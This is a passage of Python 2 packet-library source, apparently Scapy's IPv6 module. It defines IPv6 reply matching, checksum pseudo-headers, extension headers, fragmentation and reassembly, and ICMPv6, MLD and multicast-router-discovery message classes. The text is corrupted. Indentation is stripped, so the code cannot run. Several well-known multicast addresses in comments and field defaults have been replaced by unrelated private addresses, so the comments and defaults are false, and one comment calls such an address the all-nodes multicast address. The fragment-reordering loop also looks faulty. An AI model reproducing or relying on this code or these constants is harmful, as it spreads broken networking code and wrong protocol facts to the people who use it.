sd = inet_pton(socket.AF_INET6, sd)
for a in self.addresses:
a = inet_pton(socket.AF_INET6, a)
sd = strxor(sd, a)
sd = inet_ntop(socket.AF_INET6, sd)
if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
nh = self.payload.nh
if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
nh = self.payload.nh
if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
foundhao = None
for o in self.payload.options:
if isinstance(o, HAO):
foundhao = o
if foundhao:
nh = self.payload.nh # XXX what if another extension follows ?
ss = foundhao.hoa
if conf.checkIPsrc and conf.checkIPaddr:
sd = inet_pton(socket.AF_INET6, sd)
ss = inet_pton(socket.AF_INET6, self.src)
return struct.pack("B",nh)+self.payload.hashret()
else:
return struct.pack("B", nh)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, IPv6): # self is reply, other is request
return False
if conf.checkIPaddr:
ss = inet_pton(socket.AF_INET6, self.src)
sd = inet_pton(socket.AF_INET6, self.dst)
os = inet_pton(socket.AF_INET6, other.src)
od = inet_pton(socket.AF_INET6, other.dst)
# request was sent to a multicast address (other.dst)
# Check reply destination addr matches request source addr (i.e
# sd == os) except when reply is multicasted too
# XXX test mcast scope matching ?
if in6_ismaddr(other.dst):
if in6_ismaddr(self.dst):
if ((od == sd) or
(in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):
return self.payload.answers(other.payload)
return False
if (os == sd):
return self.payload.answers(other.payload)
return False
elif (sd != os): # or ss != od): <- removed for ICMP errors
return False
if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:
# ICMPv6 Error message -> generated by IPv6 packet
# Note : at the moment, we jump the ICMPv6 specific class
# to call answers() method of erroneous packet (over
# initial packet). There can be cases where an ICMPv6 error
# class could implement a specific answers method that perform
# a specific task. Currently, don't see any use ...
return self.payload.payload.answers(other)
elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
return self.payload.answers(other.payload.payload)
elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
return self.payload.answers(other.payload.payload)
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting
elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
return self.payload.payload.answers(other.payload.payload)
elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance
return self.payload.payload.answers(other.payload)
else:
if (self.nh != other.nh):
return False
return self.payload.answers(other.payload)
conf.neighbor.register_l3(Ether, IPv6, lambda l2,l3: getmacbyip6(l3.dst))
class IPerror6(IPv6):
name = "IPv6 in ICMPv6"
def answers(self, other):
if not isinstance(other, IPv6):
return False
sd = inet_pton(socket.AF_INET6, self.dst)
ss = inet_pton(socket.AF_INET6, self.src)
od = inet_pton(socket.AF_INET6, other.dst)
os = inet_pton(socket.AF_INET6, other.src)
# Make sure that the ICMPv6 error is related to the packet scapy sent
if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
# find upper layer for self (possible citation)
selfup = self.payload
while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
selfup = selfup.payload
# find upper layer for other (initial packet). Also look for RH
otherup = other.payload
request_has_rh = False
while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
if isinstance(otherup, IPv6ExtHdrRouting):
request_has_rh = True
otherup = otherup.payload
if ((ss == os and sd == od) or # <- Basic case
(ss == os and request_has_rh)): # <- Request has a RH :
# don't check dst address
# Let's deal with possible MSS Clamping
if (isinstance(selfup, TCP) and
isinstance(otherup, TCP) and
selfup.options != otherup.options): # seems clamped
# Save fields modified by MSS clamping
old_otherup_opts = otherup.options
old_otherup_cksum = otherup.chksum
old_otherup_dataofs = otherup.dataofs
old_selfup_opts = selfup.options
old_selfup_cksum = selfup.chksum
old_selfup_dataofs = selfup.dataofs
# Nullify them
otherup.options = []
otherup.chksum = 0
otherup.dataofs = 0
selfup.options = []
selfup.chksum = 0
selfup.dataofs = 0
# Test it and save result
s1 = str(selfup)
s2 = str(otherup)
l = min(len(s1), len(s2))
res = s1[:l] == s2[:l]
# recall saved values
otherup.options = old_otherup_opts
otherup.chksum = old_otherup_cksum
otherup.dataofs = old_otherup_dataofs
selfup.options = old_selfup_opts
selfup.chksum = old_selfup_cksum
selfup.dataofs = old_selfup_dataofs
return res
s1 = str(selfup)
s2 = str(otherup)
l = min(len(s1), len(s2))
return s1[:l] == s2[:l]
return False
def mysummary(self):
return Packet.mysummary(self)
#############################################################################
#############################################################################
### Upper Layer Checksum computation ###
#############################################################################
#############################################################################
class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
name = "Pseudo IPv6 Header"
fields_desc = [ IP6Field("src", "::"),
IP6Field("dst", "::"),
ShortField("uplen", None),
BitField("zero", 0, 24),
ByteField("nh", 0) ]
def in6_chksum(nh, u, p):
"""
Performs IPv6 Upper Layer checksum computation. Provided parameters are:
- 'nh' : value of upper layer protocol
- 'u' : upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
provided with all under layers (IPv6 and all extension headers,
for example)
- 'p' : the payload of the upper layer provided as a string
Functions operate by filling a pseudo header class instance (PseudoIPv6)
with
- Next Header value
- the address of _final_ destination (if some Routing Header with non
segleft field is present in underlayer classes, last address is used.)
- the address of _real_ source (basically the source address of an
IPv6 class instance available in the underlayer or the source address
in HAO option if some Destination Option header found in underlayer
includes this option).
- the length is the length of provided payload string ('p')
"""
ph6 = PseudoIPv6()
ph6.nh = nh
rthdr = 0
hahdr = 0
final_dest_addr_found = 0
while u != None and not isinstance(u, IPv6):
if (isinstance(u, IPv6ExtHdrRouting) and
u.segleft != 0 and len(u.addresses) != 0 and
final_dest_addr_found == 0):
rthdr = u.addresses[-1]
final_dest_addr_found = 1
elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
isinstance(u.options[0], HAO)):
hahdr = u.options[0].hoa
u = u.underlayer
if u is None:
warning("No IPv6 underlayer to compute checksum. Leaving null.")
return 0
if hahdr:
ph6.src = hahdr
else:
ph6.src = u.src
if rthdr:
ph6.dst = rthdr
else:
ph6.dst = u.dst
ph6.uplen = len(p)
ph6s = str(ph6)
return checksum(ph6s+p)
#############################################################################
#############################################################################
### Extension Headers ###
#############################################################################
#############################################################################
# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
name = 'Abstract IPV6 Option Header'
aliastypes = [IPv6, IPerror6] # TODO ...
#################### IPv6 options for Extension Headers #####################
_hbhopts = { 0x00: "Pad1",
0x01: "PadN",
0x04: "Tunnel Encapsulation Limit",
0x05: "Router Alert",
0x06: "Quick-Start",
0xc2: "Jumbo Payload",
0xc9: "Home Address Option" }
class _OTypeField(ByteEnumField):
"""
Modified BytEnumField that displays information regarding the IPv6 option
based on its option type value (What should be done by nodes that process
the option if they do not understand it ...)
It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
"""
pol = {0x00: "00: skip",
0x40: "01: discard",
0x80: "10: discard+ICMP",
0xC0: "11: discard+ICMP not mcast"}
enroutechange = {0x00: "0: Don't change en-route",
0x20: "1: May change en-route" }
def i2repr(self, pkt, x):
s = self.i2s.get(x, repr(x))
polstr = self.pol[(x & 0xC0)]
enroutechangestr = self.enroutechange[(x & 0x20)]
return "%s [%s, %s]" % (s, polstr, enroutechangestr)
class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
name = "Scapy6 Unknown Option"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen) ]
def alignment_delta(self, curpos): # By default, no alignment requirement
"""
As specified in section 4.2 of RFC 2460, every options has
an alignment requirement ususally expressed xn+y, meaning
the Option Type must appear at an integer multiple of x octest
from the start of the header, plus y octet.
That function is provided the current position from the
start of the header and returns required padding length.
"""
return 0
class Pad1(Packet): # IPv6 Hop-By-Hop Option
name = "Pad1"
fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class PadN(Packet): # IPv6 Hop-By-Hop Option
name = "PadN"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen)]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
name = "Router Alert"
fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
ByteField("optlen", 2),
ShortEnumField("value", None,
{ 0: "Datagram contains a MLD message",
1: "Datagram contains RSVP message",
2: "Datagram contains an Active Network message" }) ]
# TODO : Check IANA has not defined new values for value field of RouterAlertOption
# TODO : now that we have that option, we should do something in MLD class that need it
def alignment_delta(self, curpos): # alignment requirement : 2n+0
x = 2 ; y = 0
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class Jumbo(Packet): # IPv6 Hop-By-Hop Option
name = "Jumbo Payload"
fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
ByteField("optlen", 4),
IntField("jumboplen", None) ]
def alignment_delta(self, curpos): # alignment requirement : 4n+2
x = 4 ; y = 2
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class HAO(Packet): # IPv6 Destination Options Header Option
name = "Home Address Option"
fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
ByteField("optlen", 16),
IP6Field("hoa", "::") ]
def alignment_delta(self, curpos): # alignment requirement : 8n+6
x = 8 ; y = 6
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
_hbhoptcls = { 0x00: Pad1,
0x01: PadN,
0x05: RouterAlert,
0xC2: Jumbo,
0xC9: HAO }
######################## Hop-by-Hop Extension Header ########################
class _HopByHopOptionsField(PacketListField):
islist = 1
holds_packet = 1
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def i2len(self, pkt, i):
l = len(self.i2m(pkt, i))
return l
def i2count(self, pkt, i):
if type(i) is list:
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
opt = []
ret = ""
x = s
if l is not None:
x,ret = s[:l],s[l:]
while x:
if c is not None:
if c <= 0:
break
c -= 1
o = ord(x[0]) # Option type
cls = self.cls
if _hbhoptcls.has_key(o):
cls = _hbhoptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = ""
return x+ret,opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return "".join(map(str, x))
curpos = self.curpos
s = ""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
pstr = str(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class _PhantomAutoPadField(ByteField):
def addfield(self, pkt, s, val):
return s
def getfield(self, pkt, s):
return s, 1
def i2repr(self, pkt, x):
if x:
return "On"
return "Off"
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
name = "IPv6 Extension Header - Hop-by-Hop Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)/8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 0 }}
######################## Destination Option Header ##########################
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
name = "IPv6 Extension Header - Destination Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)/8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 60 }}
############################# Routing Header ################################
class IPv6ExtHdrRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Routing"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, count_of="addresses", fmt="B",
adjust = lambda pkt,x:2*x), # in 8 bytes blocks
ByteField("type", 0),
ByteField("segleft", None),
BitField("reserved", 0, 32), # There is meaning in this field ...
IP6ListField("addresses", [],
length_from = lambda pkt: 8*pkt.len)]
overload_fields = {IPv6: { "nh": 43 }}
def post_build(self, pkt, pay):
if self.segleft is None:
pkt = pkt[:3]+struct.pack("B", len(self.addresses))+pkt[4:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
########################### Fragmentation Header ############################
class IPv6ExtHdrFragment(_IPv6ExtHdr):
name = "IPv6 Extension Header - Fragmentation header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
BitField("res1", 0, 8),
BitField("offset", 0, 13),
BitField("res2", 0, 2),
BitField("m", 0, 1),
IntField("id", None) ]
overload_fields = {IPv6: { "nh": 44 }}
def defragment6(pktlist):
"""
Performs defragmentation of a list of IPv6 packets. Packets are reordered.
Crap is dropped. What lacks is completed by 'X' characters.
"""
l = filter(lambda x: IPv6ExtHdrFragment in x, pktlist) # remove non fragments
if not l:
return []
id = l[0][IPv6ExtHdrFragment].id
llen = len(l)
l = filter(lambda x: x[IPv6ExtHdrFragment].id == id, l)
if len(l) != llen:
warning("defragment6: some fragmented packets have been removed from list")
llen = len(l)
# reorder fragments
i = 0
res = []
while l:
min_pos = 0
min_offset = l[0][IPv6ExtHdrFragment].offset
for p in l:
cur_offset = p[IPv6ExtHdrFragment].offset
if cur_offset < min_offset:
min_pos = 0
min_offset = cur_offset
res.append(l[min_pos])
del(l[min_pos])
# regenerate the fragmentable part
fragmentable = ""
for p in res:
q=p[IPv6ExtHdrFragment]
offset = 8*q.offset
if offset != len(fragmentable):
warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))
fragmentable += "X"*(offset - len(fragmentable))
fragmentable += str(q.payload)
# Regenerate the unfragmentable part.
q = res[0]
nh = q[IPv6ExtHdrFragment].nh
q[IPv6ExtHdrFragment].underlayer.nh = nh
q[IPv6ExtHdrFragment].underlayer.payload = None
q /= conf.raw_layer(load=fragmentable)
return IPv6(str(q))
def fragment6(pkt, fragSize):
"""
Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already
contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected
maximum size of fragments (MTU). The list of packets is returned.
If packet does not contain an IPv6ExtHdrFragment class, it is returned in
result list.
"""
pkt = pkt.copy()
if not IPv6ExtHdrFragment in pkt:
# TODO : automatically add a fragment before upper Layer
# at the moment, we do nothing and return initial packet
# as single element of a list
return [pkt]
# If the payload is bigger than 65535, a Jumbo payload must be used, as
# an IPv6 packet can't be bigger than 65535 bytes.
if len(str(pkt[IPv6ExtHdrFragment])) > 65535:
warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")
return []
s = str(pkt) # for instantiation to get upper layer checksum right
if len(s) <= fragSize:
return [pkt]
# Fragmentable part : fake IPv6 for Fragmentable part length computation
fragPart = pkt[IPv6ExtHdrFragment].payload
tmp = str(IPv6(src="::1", dst="::1")/fragPart)
fragPartLen = len(tmp) - 40 # basic IPv6 header length
fragPartStr = s[-fragPartLen:]
# Grab Next Header for use in Fragment Header
nh = IPv6(tmp[:40]).nh
# Keep fragment header
fragHeader = pkt[IPv6ExtHdrFragment]
fragHeader.payload = None # detach payload
# Unfragmentable Part
unfragPartLen = len(s) - fragPartLen - 8
unfragPart = pkt
pkt[IPv6ExtHdrFragment].underlayer.payload = None # detach payload
# Cut the fragmentable part to fit fragSize. Inner fragments have
# a length that is an integer multiple of 8 octets. last Frag MTU
# can be anything below MTU
lastFragSize = fragSize - unfragPartLen - 8
innerFragSize = lastFragSize - (lastFragSize % 8)
if lastFragSize <= 0 or innerFragSize == 0:
warning("Provided fragment size value is too low. " +
"Should be more than %d" % (unfragPartLen + 8))
return [unfragPart/fragHeader/fragPart]
remain = fragPartStr
res = []
fragOffset = 0 # offset, incremeted during creation
fragId = random.randint(0,0xffffffff) # random id ...
if fragHeader.id is not None: # ... except id provided by user
fragId = fragHeader.id
fragHeader.m = 1
fragHeader.id = fragId
fragHeader.nh = nh
# Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
while True:
if (len(remain) > lastFragSize):
tmp = remain[:innerFragSize]
remain = remain[innerFragSize:]
fragHeader.offset = fragOffset # update offset
fragOffset += (innerFragSize / 8) # compute new one
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp)
res.append(tempo)
else:
fragHeader.offset = fragOffset # update offSet
fragHeader.m = 0
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=remain)
res.append(tempo)
break
return res
############################### AH Header ###################################
# class _AHFieldLenField(FieldLenField):
# def getfield(self, pkt, s):
# l = getattr(pkt, self.fld)
# l = (l*8)-self.shift
# i = self.m2i(pkt, s[:l])
# return s[l:],i
# class _AHICVStrLenField(StrLenField):
# def i2len(self, pkt, x):
# class IPv6ExtHdrAH(_IPv6ExtHdr):
# name = "IPv6 Extension Header - AH"
# fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
# _AHFieldLenField("len", None, "icv"),
# ShortField("res", 0),
# IntField("spi", 0),
# IntField("sn", 0),
# _AHICVStrLenField("icv", None, "len", shift=2) ]
# overload_fields = {IPv6: { "nh": 51 }}
# def post_build(self, pkt, pay):
# if self.len is None:
# pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:]
# if self.segleft is None:
# pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:]
# return _IPv6ExtHdr.post_build(self, pkt, pay)
############################### ESP Header ##################################
# class IPv6ExtHdrESP(_IPv6extHdr):
# name = "IPv6 Extension Header - ESP"
# fields_desc = [ IntField("spi", 0),
# IntField("sn", 0),
# # there is things to extract from IKE work
# ]
# overloads_fields = {IPv6: { "nh": 50 }}
#############################################################################
#############################################################################
### ICMPv6* Classes ###
#############################################################################
#############################################################################
icmp6typescls = { 1: "ICMPv6DestUnreach",
2: "ICMPv6PacketTooBig",
3: "ICMPv6TimeExceeded",
4: "ICMPv6ParamProblem",
128: "ICMPv6EchoRequest",
129: "ICMPv6EchoReply",
130: "ICMPv6MLQuery",
131: "ICMPv6MLReport",
132: "ICMPv6MLDone",
133: "ICMPv6ND_RS",
134: "ICMPv6ND_RA",
135: "ICMPv6ND_NS",
136: "ICMPv6ND_NA",
137: "ICMPv6ND_Redirect",
#138: Do Me - RFC 2894 - Seems painful
139: "ICMPv6NIQuery",
140: "ICMPv6NIReply",
141: "ICMPv6ND_INDSol",
142: "ICMPv6ND_INDAdv",
#143: Do Me - RFC 3810
144: "ICMPv6HAADRequest",
145: "ICMPv6HAADReply",
146: "ICMPv6MPSol",
147: "ICMPv6MPAdv",
#148: Do Me - SEND related - RFC 3971
#149: Do Me - SEND related - RFC 3971
151: "ICMPv6MRD_Advertisement",
152: "ICMPv6MRD_Solicitation",
153: "ICMPv6MRD_Termination",
}
icmp6typesminhdrlen = { 1: 8,
2: 8,
3: 8,
4: 8,
128: 8,
129: 8,
130: 24,
131: 24,
132: 24,
133: 8,
134: 16,
135: 24,
136: 24,
137: 40,
#139:
#140
141: 8,
142: 8,
144: 8,
145: 8,
146: 8,
147: 8,
151: 8,
152: 4,
153: 4
}
icmp6types = { 1 : "Destination unreachable",
2 : "Packet too big",
3 : "Time exceeded",
4 : "Parameter problem",
100 : "Private Experimentation",
101 : "Private Experimentation",
128 : "Echo Request",
129 : "Echo Reply",
130 : "MLD Query",
131 : "MLD Report",
132 : "MLD Done",
133 : "Router Solicitation",
134 : "Router Advertisement",
135 : "Neighbor Solicitation",
136 : "Neighbor Advertisement",
137 : "Redirect Message",
138 : "Router Renumbering",
139 : "ICMP Node Information Query",
140 : "ICMP Node Information Response",
141 : "Inverse Neighbor Discovery Solicitation Message",
142 : "Inverse Neighbor Discovery Advertisement Message",
143 : "Version 2 Multicast Listener Report",
144 : "Home Agent Address Discovery Request Message",
145 : "Home Agent Address Discovery Reply Message",
146 : "Mobile Prefix Solicitation",
147 : "Mobile Prefix Advertisement",
148 : "Certification Path Solicitation",
149 : "Certification Path Advertisement",
151 : "Multicast Router Advertisement",
152 : "Multicast Router Solicitation",
153 : "Multicast Router Termination",
200 : "Private Experimentation",
201 : "Private Experimentation" }
class _ICMPv6(Packet):
name = "ICMPv6 dummy class"
overload_fields = {IPv6: {"nh": 58}}
def post_build(self, p, pay):
p += pay
if self.cksum == None:
chksum = in6_chksum(58, self.underlayer, p)
p = p[:2]+struct.pack("!H", chksum)+p[4:]
return p
def hashret(self):
return self.payload.hashret()
def answers(self, other):
# isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
if (isinstance(self.underlayer, IPerror6) or
isinstance(self.underlayer, _IPv6ExtHdr) and
isinstance(other, _ICMPv6)):
if not ((self.type == other.type) and
(self.code == other.code)):
return 0
return 1
return 0
class _ICMPv6Error(_ICMPv6):
name = "ICMPv6 errors dummy class"
def guess_payload_class(self,p):
return IPerror6
class ICMPv6Unknown(_ICMPv6):
name = "Scapy6 ICMPv6 fallback class"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
StrField("msgbody", "")]
################################## RFC 2460 #################################
class ICMPv6DestUnreach(_ICMPv6Error):
name = "ICMPv6 Destination Unreachable"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteEnumField("code",0, { 0: "No route to destination",
1: "Communication with destination administratively prohibited",
2: "Beyond scope of source address",
3: "Address unreachable",
4: "Port unreachable" }),
XShortField("cksum", None),
XIntField("unused",0x00000000)]
class ICMPv6PacketTooBig(_ICMPv6Error):
name = "ICMPv6 Packet Too Big"
fields_desc = [ ByteEnumField("type",2, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("mtu",1280)]
class ICMPv6TimeExceeded(_ICMPv6Error):
name = "ICMPv6 Time Exceeded"
fields_desc = [ ByteEnumField("type",3, icmp6types),
ByteEnumField("code",0, { 0: "hop limit exceeded in transit",
1: "fragment reassembly time exceeded"}),
XShortField("cksum", None),
XIntField("unused",0x00000000)]
# The default pointer value is set to the next header field of
# the encapsulated IPv6 packet
class ICMPv6ParamProblem(_ICMPv6Error):
name = "ICMPv6 Parameter Problem"
fields_desc = [ ByteEnumField("type",4, icmp6types),
ByteEnumField("code",0, {0: "erroneous header field encountered",
1: "unrecognized Next Header type encountered",
2: "unrecognized IPv6 option encountered"}),
XShortField("cksum", None),
IntField("ptr",6)]
class ICMPv6EchoRequest(_ICMPv6):
name = "ICMPv6 Echo Request"
fields_desc = [ ByteEnumField("type", 128, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id",0),
XShortField("seq",0),
StrField("data", "")]
def mysummary(self):
return self.sprintf("%name% (id: %id% seq: %seq%)")
def hashret(self):
return struct.pack("HH",self.id,self.seq)+self.payload.hashret()
class ICMPv6EchoReply(ICMPv6EchoRequest):
name = "ICMPv6 Echo Reply"
type = 129
def answers(self, other):
# We could match data content between request and reply.
return (isinstance(other, ICMPv6EchoRequest) and
self.id == other.id and self.seq == other.seq and
self.data == other.data)
############ ICMPv6 Multicast Listener Discovery (RFC3810) ##################
# tous les messages MLD sont emis avec une adresse source lien-locale
# -> Y veiller dans le post_build si aucune n'est specifiee
# La valeur de Hop-Limit doit etre de 1
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
# header. (The router alert option is necessary to cause routers to
# examine MLD messages sent to multicast addresses in which the router
# itself has no interest"
class _ICMPv6ML(_ICMPv6):
fields_desc = [ ByteEnumField("type", 130, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ShortField("mrd", 0),
ShortField("reserved", 0),
IP6Field("mladdr","::")]
# general queries are sent to the link-scope all-nodes multicast
# address fdf8:f53e:61e4::18, with a multicast address field of 0 and a MRD of
# [Query Response Interval]
# Default value for mladdr is set to 0 for a General Query, and
# overloaded by the user for a Multicast Address specific query
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Query"
type = 130
mrd = 10000
mladdr = "::" # 10s for mrd
overload_fields = {IPv6: { "dst": "fdf8:f53e:61e4::18", "hlim": 1, "nh": 58 }}
def hashret(self):
if self.mladdr != "::":
return struct.pack("HH",self.mladdr)+self.payload.hashret()
else:
return self.payload.hashret()
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Report"
type = 131
overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
# implementer le hashret et le answers
# When a node ceases to listen to a multicast address on an interface,
# it SHOULD send a single Done message to the link-scope all-routers
# multicast address (fc00:e968:6179::de52:7100), carrying in its multicast address field
# the address to which it is ceasing to listen
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Done"
type = 132
overload_fields = {IPv6: { "dst": "fdf8:f53e:61e4::18", "hlim": 1, "nh": 58}}
########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ###############
# TODO:
# - 04/09/06 troglocan : find a way to automatically add a router alert
# option for all MRD packets. This could be done in a specific
# way when IPv6 is the under layer with some specific keyword
# like 'exthdr'. This would allow to keep compatibility with
# providing IPv6 fields to be overloaded in fields_desc.
#
# At the moment, if user inserts an IPv6 Router alert option
# none of the IPv6 default values of IPv6 layer will be set.
class ICMPv6MRD_Advertisement(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Advertisement"
fields_desc = [ByteEnumField("type", 151, icmp6types),
ByteField("advinter", 20),
XShortField("cksum", None),
ShortField("queryint", 0),
ShortField("robustness", 0)]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "fdf8:f53e:61e4::18"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:8], s[8:]
class ICMPv6MRD_Solicitation(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Solicitation"
fields_desc = [ByteEnumField("type", 152, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "fdf8:f53e:61e4::18"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
class ICMPv6MRD_Termination(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Termination"
fields_desc = [ByteEnumField("type", 153, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
################### ICMPv6 Neighbor Discovery (RFC 2461) ####################
icmp6ndopts = { 1: "Source Link-Layer Address",
2: "Target Link-Layer Address",
3: "Prefix Information",
4: "Redirected Header",
5: "MTU",
6: "NBMA Shortcut Limit Option", # RFC2491
7: "Advertisement Interval Option",
8: "Home Agent Information Option",
9: "Source Address List",
10: "Target Address List",
11: "CGA Option", # RFC 3971
12: "RSA Signature Option", # RFC 3971
13: "Timestamp Option", # RFC 3971
14: "Nonce option", # RFC 3971
15: "Trust Anchor Option", # RFC 3971
16: "Certificate Option", # RFC 3971
17: "IP Address Option", # RFC 4068
18: "New Router Prefix Information Option", # RFC 4068
19: "Link-layer Address Option", # RFC 4068
20: "Neighbor Advertisement Acknowledgement Option",
21: "CARD Request Option", # RFC 4065/4066/4067
22: "CARD Reply Option", # RFC 4065/4066/4067
23: "MAP Option", # RFC 4140
24: "Route Information Option", # RFC 4191
25: "Recusive DNS Server Option",
26: "IPv6 Router Advertisement Flags Option"
}
icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr",
2: "ICMPv6NDOptDstLLAddr",
3: "ICMPv6NDOptPrefixInfo",
4: "ICMPv6NDOptRedirectedHdr",
5: "ICMPv6NDOptMTU",
6: "ICMPv6NDOptShortcutLimit",
7: "ICMPv6NDOptAdvInterval",
8: "ICMPv6NDOptHAInfo",
9: "ICMPv6NDOptSrcAddrList",
10: "ICMPv6NDOptTgtAddrList",
#11: Do Me,
#12: Do Me,
#13: Do Me,
#14: Do Me,
#15: Do Me,
#16: Do Me,
17: "ICMPv6NDOptIPAddr",
18: "ICMPv6NDOptNewRtrPrefix",
19: "ICMPv6NDOptLLA",
#18: Do Me,
#19: Do Me,
#20: Do Me,
#21: Do Me,
#22: Do Me,
23: "ICMPv6NDOptMAP",
24: "ICMPv6NDOptRouteInfo",
25: "ICMPv6NDOptRDNSS",
26: "ICMPv6NDOptEFA"
}
class _ICMPv6NDGuessPayload:
name = "Dummy ND class that implements guess_payload_class()"
